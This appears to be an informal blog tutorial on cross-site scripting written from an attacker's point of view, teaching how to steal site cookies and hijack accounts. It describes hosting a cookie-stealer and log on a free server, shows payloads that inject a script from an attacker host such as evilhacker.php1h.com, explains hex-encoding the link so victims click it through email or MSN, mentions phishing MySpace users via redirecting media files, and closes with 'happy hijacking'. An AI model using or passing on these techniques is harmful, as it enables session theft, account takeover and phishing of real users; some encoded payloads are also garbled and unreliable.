well what is a xss attack well this is the art of running scrips in your victims pc you can almost run any script in there browser with the right knowledge the most ideas xss is used for stealing cookies
the cookies are bits of information used by web servers / web sites to check who u are on on that site
if your a guest it will set a cookie saying your a guest when u login it will replace that cookie with your cookie that you logged in with that will have your login id , sometimes if its a forum your password encrypted in md5 hash
and other stuff what the site can think of using to make sure u are who u say u are
like session id's what expire after a time limit what the server sets like 10 mins or 60 mins
well in the cookie it has sections that are named so when the server checks who you are
it will read bits of data like the ID and the md5 hash if its a forum most
of the time a forum will be using the cookie prefix as default like
nukeevo_ID and so on but the forum admin can change that .
Whats a user id? well this if you are the first to sign up to a forum your id will be ONE because you
will be the first in the sql table ... i will talk about the sql tables latter. the admin account is
nearly almost all the time ID 1 or 2 because of-course he would of had to make the account first
to config the forum now when looking for this type of attack the is ways looking for this type of attack
first getting the hacker point of view of this is to run that script no matter what looking at every way
he or she can find on myspace the was using flash files to not steal cookies because myspace filter
java script but instead redirecting to a fake login page the files for this can be found in downloads.
that was using .swf files but the newest one for Myspace is using .mov files this is using quick-time files
to get a url what would be to your fake log in a good FREE server to host to run php files is
www.php1h.com you wold upload your cookie stealing scripts on taht server so you can send the users cookie
to that site and view it in the log.
ok how you cud set it up would be
http://evilhacker.php1h.com/cookiestealer.php = this is the back bone it takes the cookie from the java script we run called XSS.js
http://evilhacker.php1h.com/log.php = this is the log wher the cookie will be sent after the cookiestealer has sent it to the log
www.evilhacker.php1h.com/xss.js = this is the java script that gives the cookie to the cookiestealer.php
: finding xss attacks :
well the first way will be viewing the site and looking around for any input box's and then viewing the source of that site for the name of the input
box we find a xss exploit in when looking for a xss u need to make sure that
u look at the url in the URLbar and u mite see stuff that look like
www.site.com/blah.html or .php or .cfm or .jsp ..
make sure it has the full url and if it has stuff after a ? mark add it at the end of the url like this by using a &
www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script) so if the input box was called milk for some reason i don't know why but just for this tut lets say that.and that the script will just print the words Xss on screen.
www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>
the is "> because it tells the input box to stop reading there and then it runs the java script
and if the input box was called cat it would look like this
www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>
so go round a site looking for any type of input box's some times i find if a site has
send to a friend that email box some times works.
after u found it like u get a pop up with the words Xss in it then u will view source and look for the words XSs in a input box the basic sytnax for how it will look like is
<input type="hidden" name="milk" value="" />
you see and from ther you will make the url
what i will talk about at the end so after finding that a xss and ur able 2 run it in your browser
you wont to start running the cookie grabbing scripts in your browser they will look like this
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>
if u sent some one that link in a email or on msn it would run in there browser
to execute that java script to steal there cookies from site.com so if you found a xss in msn.com
you wold have the cookies from msn.com
but you mite ask your self how do i swap my cookies ? well if you are using firefox the is a add on u can install called cookie editor and
then you can edit your cookies or using IE I am sure you can edit them in internet temp files or something but your best bet is FF(firefox)
just remember when u steal the cookies they all wont be one long string they should be broken up in 2 names like UID,others....out there but u will just have
to work that out for your self
sending the link to a victim can be hard work sometimes if some one sent you a link that looked like this :
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script> i wudnt click it
but :P if u encrypted some of the words in that url in to hex like this
useing this table :
[img]http://62.31.49.95/asciifull.gif[/img]
you cud encrpt it to look sometink like this
%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E = is the script encoded in hex
wud u click that insted and to send it through msn you mite wont to add a another & at the end and fill it with shit
like
www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12<that would just make it think it needs to include the link the full of it the is other ways like using .gif images to run the script on the site but thats a another story.
well thats it for now hope you enjoyed the read
happy hijacking
0 comments:
Post a Comment